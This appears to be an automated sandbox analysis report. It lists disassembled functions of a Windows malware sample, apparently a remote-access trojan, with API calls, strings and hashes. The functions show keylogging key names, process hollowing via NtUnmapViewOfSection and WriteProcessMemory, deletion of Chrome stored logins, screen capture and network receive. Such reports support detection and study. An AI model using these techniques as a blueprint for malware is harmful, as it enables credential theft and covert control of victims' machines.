                              • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,00415268,?), ref: 0040BE97
                              Strings
                              Memory Dump Source
                              • Source File: 0000000D.00000002.1423533944.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_13_2_400000_JXHPwNYzysUjKo.jbxd
                              Yara matches
                              Similarity
                              • API ID: V?$allocator@$U?$char_traits@$D@std@@$D@2@@std@@$??1?$basic_string@$V?$basic_string@$D@2@@0@Hstd@@$G@std@@$??0?$basic_string@G@2@@std@@V10@0@$D@1@@V01@@$?c_str@?$basic_string@$??4?$basic_string@?length@?$basic_string@FileFindV01@V10@@$??9std@@FirstG@1@@G@2@@0@Next
                              • String ID: P)?$err_notopendir$fileslist
                              • API String ID: 1112994111-4220216450
                              • Opcode ID: 79c9baee2965a832a462d8af47ffc6020858f19acde58111eb033dc6fc779f9d
                              • Instruction ID: 305903b0592b6c70fea0d48260eb7629651e495e35dfa161c8be6dc2ead5f216
                              • Opcode Fuzzy Hash: 79c9baee2965a832a462d8af47ffc6020858f19acde58111eb033dc6fc779f9d
                              • Instruction Fuzzy Hash: 7B51AE7290010EABCB04EBA0DD49DDE7B7CEF55305F044176F606E2190EF789A99CBA9
                              Function 004043BF Relevance: 55.1, APIs: 3, Strings: 28, Instructions: 882COMMON
                              Download Yara Rule
                              APIs
                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60( [F7] ,?,00000001,?,753DC0D0,?), ref: 00404677
                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(00410854,?), ref: 00404C01
                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(00410834,?,?,?,?,00000001), ref: 00404D53
                              Strings
                              Memory Dump Source
                              • Source File: 0000000D.00000002.1423533944.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_13_2_400000_JXHPwNYzysUjKo.jbxd
                              Yara matches
                              Similarity
                              • API ID: V?$allocator@$??0?$basic_string@D@1@@D@2@@std@@D@std@@U?$char_traits@
                              • String ID: [BckSp] $ [Del] $ [Down] $ [End] $ [Enter] $ [Esc] $ [F10] $ [F11] $ [F12] $ [F1] $ [F2] $ [F3] $ [F4] $ [F5] $ [F6] $ [F7] $ [F8] $ [F9] $ [Left] $ [PagDw] $ [PagUp] $ [Pause] $ [Print] $ [Right] $ [Start] $ [Tab] $ [Up] $s8@
                              • API String ID: 4257247948-2145460947
                              • Opcode ID: 6bbf6ec999e19eb7867b1fa4a36c1815a98bb4653b43f698e8fc3cbebbd7f826
                              • Instruction ID: 6621d6dcba6f39f3780b877212494eafe7300683ab97f71c5a1edef2570af96d
                              • Opcode Fuzzy Hash: 6bbf6ec999e19eb7867b1fa4a36c1815a98bb4653b43f698e8fc3cbebbd7f826
                              • Instruction Fuzzy Hash: 3F32C4E2608009BBEB04B5ACC996DFF763DD6C1340B50096BEA02B31C5F97A994456EB
                              Function 00407D38 Relevance: 52.6, APIs: 18, Strings: 12, Instructions: 69libraryloaderCOMMON
                              Download Yara Rule
                              APIs
                              • LoadLibraryA.KERNEL32(Psapi.dll,GetModuleFileNameExA,00415978,00000000,00415940,0040759D,?,?,?,?,?,?,?,?,004108CC,00000000), ref: 00407D4B
                              • GetProcAddress.KERNEL32(00000000), ref: 00407D54
                              • GetModuleHandleA.KERNEL32(Kernel32.dll,GetModuleFileNameExA,?,?,?,?,?,?,?,?,004108CC,00000000), ref: 00407D6F
                              • GetProcAddress.KERNEL32(00000000), ref: 00407D72
                              • LoadLibraryA.KERNEL32(Psapi.dll,GetModuleFileNameExW,?,?,?,?,?,?,?,?,004108CC,00000000), ref: 00407D83
                              • GetProcAddress.KERNEL32(00000000), ref: 00407D86
                              • GetModuleHandleA.KERNEL32(Kernel32.dll,GetModuleFileNameExW,?,?,?,?,?,?,?,?,004108CC,00000000), ref: 00407DA0
                              • GetProcAddress.KERNEL32(00000000), ref: 00407DA3
                              • LoadLibraryA.KERNEL32(kernel32.dll,GlobalMemoryStatusEx,?,?,?,?,?,?,?,?,004108CC,00000000), ref: 00407DB4
                              • GetProcAddress.KERNEL32(00000000), ref: 00407DB7
                              • GetModuleHandleA.KERNEL32(kernel32,IsWow64Process,?,?,?,?,?,?,?,?,004108CC,00000000), ref: 00407DC9
                              • GetProcAddress.KERNEL32(00000000), ref: 00407DCC
                              • GetModuleHandleA.KERNEL32(kernel32,GetComputerNameExW,?,?,?,?,?,?,?,?,004108CC,00000000), ref: 00407DD9
                              • GetProcAddress.KERNEL32(00000000), ref: 00407DDC
                              • GetModuleHandleA.KERNEL32(Shell32,IsUserAnAdmin,?,?,?,?,?,?,?,?,004108CC,00000000), ref: 00407DED
                              • GetProcAddress.KERNEL32(00000000), ref: 00407DF0
                              • GetModuleHandleA.KERNEL32(kernel32,SetProcessDEPPolicy,?,?,?,?,?,?,?,?,004108CC,00000000), ref: 00407DFD
                              • GetProcAddress.KERNEL32(00000000), ref: 00407E00
                              Strings
                              Memory Dump Source
                              • Source File: 0000000D.00000002.1423533944.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_13_2_400000_JXHPwNYzysUjKo.jbxd
                              Yara matches
                              Similarity
                              • API ID: AddressProc$HandleModule$LibraryLoad
                              • String ID: GetComputerNameExW$GetModuleFileNameExA$GetModuleFileNameExW$GlobalMemoryStatusEx$IsUserAnAdmin$IsWow64Process$Kernel32.dll$Psapi.dll$SetProcessDEPPolicy$Shell32$kernel32$kernel32.dll
                              • API String ID: 551388010-3266460993
                              • Opcode ID: a95c33b2883edc0f1f24b44dfa6ebdd0fa9b065003bbad78de045f2cdf40495f
                              • Instruction ID: 7df7edf4bea3ca915ca9c3ab11915317f4629f066757df969619983bfa8a711c
                              • Opcode Fuzzy Hash: a95c33b2883edc0f1f24b44dfa6ebdd0fa9b065003bbad78de045f2cdf40495f
                              • Instruction Fuzzy Hash: D8112EF0E51794FAC720ABB6AC49FDA2E9CAA8C7513118427F204D3570D6BC94C08E6D
                              Function 0040D71E Relevance: 51.0, APIs: 27, Strings: 2, Instructions: 224windowCOMMON
                              Download Yara Rule
                              APIs
                              • CreateDCA.GDI32(DISPLAY,00000000,00000000,00000000), ref: 0040D731
                              • CreateCompatibleDC.GDI32(00000000), ref: 0040D73D
                              • GetDeviceCaps.GDI32(00000000,00000008), ref: 0040D74F
                              • GetDeviceCaps.GDI32(00000000,0000000A), ref: 0040D757
                              • CreateCompatibleBitmap.GDI32(00000000,76F90F00,00000000), ref: 0040D760
                              • SelectObject.GDI32(@YA,00000000), ref: 0040D779
                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(00000000,?,?,00000000), ref: 0040D8B2
                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?,?,00000000), ref: 0040D8F0
                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?,?,00000000), ref: 0040D8FD
                              • ?assign@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@PBDI@Z.MSVCP60(00004D42,0000000E,?,00000000), ref: 0040D90C
                              • ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(?,?,00000000), ref: 0040D919
                              • ?assign@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@PBDI@Z.MSVCP60(00000000,00000028,?,00000000), ref: 0040D925
                              • ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(?,?,00000000), ref: 0040D932
                              • ?assign@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@PBDI@Z.MSVCP60(00000000,?,?,00000000), ref: 0040D93F
                              • ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(?,?,00000000), ref: 0040D94C
                              • DeleteObject.GDI32(?), ref: 0040D955
                              • GlobalFree.KERNEL32(00000000), ref: 0040D95C
                              • DeleteDC.GDI32(?), ref: 0040D96B
                              • DeleteDC.GDI32(?), ref: 0040D970
                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?,?,00000000), ref: 0040D979
                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,00000000), ref: 0040D982
                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,00000000), ref: 0040D98B
                              Strings
                              Memory Dump Source
                              • Source File: 0000000D.00000002.1423533944.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_13_2_400000_JXHPwNYzysUjKo.jbxd
                              Yara matches
                              Similarity
                              • API ID: V?$allocator@$D@2@@std@@D@std@@U?$char_traits@$??0?$basic_string@V01@@$?assign@?$basic_string@CreateD@1@@DeleteV01@V12@Y?$basic_string@$??1?$basic_string@CapsCompatibleDeviceObject$BitmapFreeGlobalSelect
                              • String ID: @YA$DISPLAY
                              • API String ID: 2042352699-3806539182
                              • Opcode ID: f8ea951f423c690b1eb50e56cfb3c698429a31a2134a368dde3a1e94205186cb
                              • Instruction ID: 01507db8c7ea154ffe35bb8a62b7e06070cb60eb7de7f760769c3134c364176c
                              • Opcode Fuzzy Hash: f8ea951f423c690b1eb50e56cfb3c698429a31a2134a368dde3a1e94205186cb
                              • Instruction Fuzzy Hash: 3F813E75900209AFDB10DFA1DC88EDEBBB8FF48700F10842AF556E7190E775AA49CB58
                              Function 004081B7 Relevance: 48.2, APIs: 32, Instructions: 160processCOMMON
                              Download Yara Rule
                              APIs
                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?), ref: 004081C8
                                • Part of subcall function 0040F0B5: GetCurrentProcess.KERNEL32(u@,?,?,004075EA), ref: 0040F0C6
                              • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 004081DC
                              • Process32FirstW.KERNEL32(00000000,?), ref: 004081F5
                              • Process32NextW.KERNEL32(00000000,0000022C), ref: 00408202
                              • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(?,?,00415268,00000002,00000000), ref: 00408223
                                • Part of subcall function 0040F0DF: OpenProcess.KERNEL32(00000400,00000000,?,?,00407F70,?), ref: 0040F0F5
                                • Part of subcall function 0040ED35: _itoa.MSVCRT ref: 0040ED53
                                • Part of subcall function 0040ED35: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(?,?,?,?,?,?,?,?,?,?,0040A186,?,00000000), ref: 0040ED67
                                • Part of subcall function 0040F16A: OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 0040F17D
                                • Part of subcall function 0040F16A: ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(?,?), ref: 0040F1B5
                                • Part of subcall function 0040EDD3: ?length@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIXZ.MSVCP60(?,?,00415940,00415268,00415268,00000000,00415268,00000000), ref: 0040EDE3
                                • Part of subcall function 0040EDD3: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z.MSVCP60(004118A0,00000000,?,00415940,00415268,00415268,00000000,00415268,00000000), ref: 0040EDF4
                                • Part of subcall function 0040EDD3: ?length@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIXZ.MSVCP60(?,00415940,00415268,00415268,00000000,00415268,00000000), ref: 0040EDFD
                                • Part of subcall function 0040EDD3: ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(?,00415940,00415268,00415268,00000000,00415268,00000000), ref: 0040EE0A
                                • Part of subcall function 0040EDD3: ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(?,00415940,00415268,00415268,00000000,00415268,00000000), ref: 0040EE15
                                • Part of subcall function 0040EDD3: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(hRA,?,00415940,00415268,00415268,00000000,00415268,00000000), ref: 0040EE34
                                • Part of subcall function 0040EDD3: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,00415940,00415268,00415268,00000000,00415268,00000000), ref: 0040EE3D
                              • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,?,00000000,?,?,00411158,00000000,00411158,00000000,00411158,00000000,?,00410858), ref: 0040829E
                              • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000,?,?,?,00411158,00000000,00411158,00000000,00411158,00000000,?,00410858), ref: 004082AE
                              • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?,?,?,?,00411158,00000000,00411158,00000000,00411158,00000000,?,00410858), ref: 004082BB
                              • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,?,?,00411158,00000000,00411158,00000000,00411158), ref: 004082CB
                              • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,00411158,00000000), ref: 004082D8
                              • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000), ref: 004082E8
                              • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 004082F5
                              • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000), ref: 00408305
                              • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 00408311
                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040831D
                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00408326
                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00408332
                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040833B
                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00408347
                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00408350
                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040835C
                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00408365
                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040836E
                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040837A
                              • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00408386
                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00408392
                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040839E
                              • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 004083A7
                              • Process32NextW.KERNEL32(00000000,0000022C), ref: 004083B5
                              • CloseHandle.KERNEL32(00000000,00000002,00000000), ref: 004083C4
                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 004083D1
                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004083DA
                              Memory Dump Source
                              • Source File: 0000000D.00000002.1423533944.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_13_2_400000_JXHPwNYzysUjKo.jbxd
                              Yara matches
                              Similarity
                              • API ID: V?$allocator@$U?$char_traits@$D@std@@$D@2@@std@@$??1?$basic_string@$D@2@@0@Hstd@@V?$basic_string@$??0?$basic_string@G@2@@std@@G@std@@$V10@V10@0@$D@1@@ProcessProcess32V01@@$?c_str@?$basic_string@?length@?$basic_string@G@1@@NextOpen$??4?$basic_string@CloseCreateCurrentFirstHandleSnapshotToolhelp32V01@_itoa
                              • String ID:
                              • API String ID: 2162064046-0
                              • Opcode ID: 90dc70f258533a68b46da8f8f7d027193591623f57b0638dd68ad9842d51368f
                              • Instruction ID: 59879eeb23424d9b9582fbd1b4132700e7662ed198339718a96ed2a8ede2f5f3
                              • Opcode Fuzzy Hash: 90dc70f258533a68b46da8f8f7d027193591623f57b0638dd68ad9842d51368f
                              • Instruction Fuzzy Hash: 7A51EF7190011EABCB15EBA1DD4AEDEB77CAF54308F1044B6B506B2051EE789F4D8F68
                              Function 0040D477 Relevance: 26.4, APIs: 13, Strings: 2, Instructions: 149injectionthreadmemoryCOMMON
                              Download Yara Rule
                              APIs
                              • _EH_prolog.MSVCRT ref: 0040D47C
                              • GetModuleHandleA.KERNEL32(ntdll.dll,NtUnmapViewOfSection,00000000,00000000,76F92EE0), ref: 0040D499
                              • GetProcAddress.KERNEL32(00000000), ref: 0040D4A0
                              • CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000000,00000004,00000000,00000000,?,?), ref: 0040D4F7
                              • VirtualAlloc.KERNEL32(00000000,00000004,00001000,00000004), ref: 0040D50D
                              • GetThreadContext.KERNEL32(?,00000000), ref: 0040D522
                              • ReadProcessMemory.KERNEL32(?,?,?,00000004,00000000), ref: 0040D544
                              • VirtualAllocEx.KERNEL32(?,?,?,00003000,00000040), ref: 0040D56C
                              • WriteProcessMemory.KERNEL32(?,00000000,?,?,00000000), ref: 0040D58F
                              • WriteProcessMemory.KERNEL32(?,?,?,?,00000000), ref: 0040D5C9
                              • WriteProcessMemory.KERNEL32(?,?,?,00000004,00000000), ref: 0040D5E8
                              • SetThreadContext.KERNEL32(?,00000000), ref: 0040D5FA
                              • ResumeThread.KERNEL32(?), ref: 0040D603
                              Strings
                              Memory Dump Source
                              • Source File: 0000000D.00000002.1423533944.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_13_2_400000_JXHPwNYzysUjKo.jbxd
                              Yara matches
                              Similarity
                              • API ID: Process$Memory$ThreadWrite$AllocContextVirtual$AddressCreateH_prologHandleModuleProcReadResume
                              • String ID: NtUnmapViewOfSection$ntdll.dll
                              • API String ID: 65594003-1050664331
                              • Opcode ID: d5acba7396d781dfe8e0530a3340aeb650af1a56d6ef9ed814e80dd6dc194395
                              • Instruction ID: 491b69bf14096d3796cb56c0b3543e1f41dcebd31bc2b04dfda4688c6db47199
                              • Opcode Fuzzy Hash: d5acba7396d781dfe8e0530a3340aeb650af1a56d6ef9ed814e80dd6dc194395
                              • Instruction Fuzzy Hash: C1515E71900208AFDB209FA4DC45FAEBBB9FF48314F10842AFA15E72A1D7759944DF18
                              Function 00405622 Relevance: 26.3, APIs: 11, Strings: 4, Instructions: 68fileCOMMON
                              Download Yara Rule
                              APIs
                              • getenv.MSVCRT ref: 00405637
                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(00000000), ref: 00405642
                              • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000), ref: 0040564D
                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00405658
                              • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60 ref: 00405661
                              • DeleteFileA.KERNEL32(00000000), ref: 00405668
                              • GetLastError.KERNEL32 ref: 00405672
                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60([Chrome StoredLogins not found],?,?,?,?,00000000), ref: 00405693
                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,00000000), ref: 004056A6
                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60([Chrome StoredLogins found, cleared!],?,?,?,?,00000000), ref: 004056CC
                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,00000000), ref: 004056E1
                              Strings
                              • UserProfile, xrefs: 00405632
                              • \AppData\Local\Google\Chrome\User Data\Default\Login Data, xrefs: 0040562C
                              • [Chrome StoredLogins not found], xrefs: 0040568E
                              • [Chrome StoredLogins found, cleared!], xrefs: 004056C7
                              Memory Dump Source
                              • Source File: 0000000D.00000002.1423533944.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_13_2_400000_JXHPwNYzysUjKo.jbxd
                              Yara matches
                              Similarity
                              • API ID: V?$allocator@$D@std@@U?$char_traits@$D@2@@std@@$??0?$basic_string@??1?$basic_string@D@1@@$?c_str@?$basic_string@D@2@@0@DeleteErrorFileHstd@@LastV10@V?$basic_string@getenv
                              • String ID: [Chrome StoredLogins found, cleared!]$[Chrome StoredLogins not found]$UserProfile$\AppData\Local\Google\Chrome\User Data\Default\Login Data
                              • API String ID: 3740952235-1062637481
                              • Opcode ID: 9c470a860a31c0957fbf0af584cff9b589e999483a72c533940556fb038f18dd
                              • Instruction ID: 4f69eec6fecf3c2889a810bfc1713c7a18bd464deb3961be00d6ef52500a67c9
                              • Opcode Fuzzy Hash: 9c470a860a31c0957fbf0af584cff9b589e999483a72c533940556fb038f18dd
                              • Instruction Fuzzy Hash: F0116331640509ABD700ABE4DD1EAFE7778EB54305F504477E402F21D0EEB95E88CBAA
                              Function 00402832 Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 62sleeptimeCOMMON
                              Download Yara Rule
                              APIs
                              • Sleep.KERNEL32(000003E8), ref: 00402854
                              • GetLocalTime.KERNEL32(?), ref: 00402876
                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(%02i:%02i:%02i:%03i [KeepAlive] ,?,Timeout expired, resetting connection.,?,?,?,?), ref: 004028A1
                              • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000), ref: 004028AC
                              • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60 ref: 004028B6
                              • printf.MSVCRT ref: 004028BD
                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004028C9
                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004028D2
                              Strings
                              • %02i:%02i:%02i:%03i [KeepAlive] , xrefs: 0040289C
                              • Timeout expired, resetting connection., xrefs: 00402896
                              Memory Dump Source
                              • Source File: 0000000D.00000002.1423533944.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_13_2_400000_JXHPwNYzysUjKo.jbxd
                              Yara matches
                              Similarity
                              • API ID: V?$allocator@$D@std@@U?$char_traits@$D@2@@std@@$??1?$basic_string@$??0?$basic_string@?c_str@?$basic_string@D@1@@D@2@@0@Hstd@@LocalSleepTimeV10@V?$basic_string@printf
                              • String ID: %02i:%02i:%02i:%03i [KeepAlive] $Timeout expired, resetting connection.
                              • API String ID: 2756237499-72633004
                              • Opcode ID: 8a003b9b96387b9a977b2827803bf9a6b624b48ad5c8bb1a43ea3030722d3ccf
                              • Instruction ID: 772636e3ebd337da963efdda9584c1e6191fd0daf56e0bc3e27ada7e64864670
                              • Opcode Fuzzy Hash: 8a003b9b96387b9a977b2827803bf9a6b624b48ad5c8bb1a43ea3030722d3ccf
                              • Instruction Fuzzy Hash: 03118B76941244AFC750EBE5DA898EFB7F8BE04300750457BF543E2590DAB8EE84C729
                              Function 0040221C Relevance: 16.6, APIs: 11, Instructions: 73networkCOMMON
                              Download Yara Rule
                              APIs
                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?,00415A30,00415940,00415268,?,?,?,?,?,?,?,?,?,?,0040A628,0040A71E), ref: 0040222E
                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,0040A628,0040A71E,00000001), ref: 0040223B
                              • malloc.MSVCRT ref: 00402248
                              • recv.WS2_32(00415A30,00000000,00000000,00000000), ref: 00402259
                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z.MSVCP60(00000000,00000000,?,?,?,?,?,?,?,?,?,?,0040A628,0040A71E,00000001), ref: 0040226D
                              • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,?,?,?,?,?,?,?,?,0040A628,0040A71E,00000001), ref: 00402277
                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,0040A628,0040A71E,00000001), ref: 00402280
                              • ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(?,?,?,?,?,?,?,?,?,?,0040A628,0040A71E,00000001), ref: 0040228D
                                • Part of subcall function 004022EA: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?,00000000,00415A30,00000000), ref: 004022FC
                                • Part of subcall function 004022EA: ??9std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z.MSVCP60(00415258,00410668), ref: 00402314
                                • Part of subcall function 004022EA: ?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60 ref: 00402323
                                • Part of subcall function 004022EA: ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000), ref: 0040232D
                                • Part of subcall function 004022EA: ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,00000000), ref: 00402346
                                • Part of subcall function 004022EA: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040234F
                                • Part of subcall function 004022EA: ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(?,00415A60), ref: 0040236E
                                • Part of subcall function 004022EA: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60 ref: 0040238E
                                • Part of subcall function 004022EA: ??9std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z.MSVCP60(00415258,00410668), ref: 004023A6
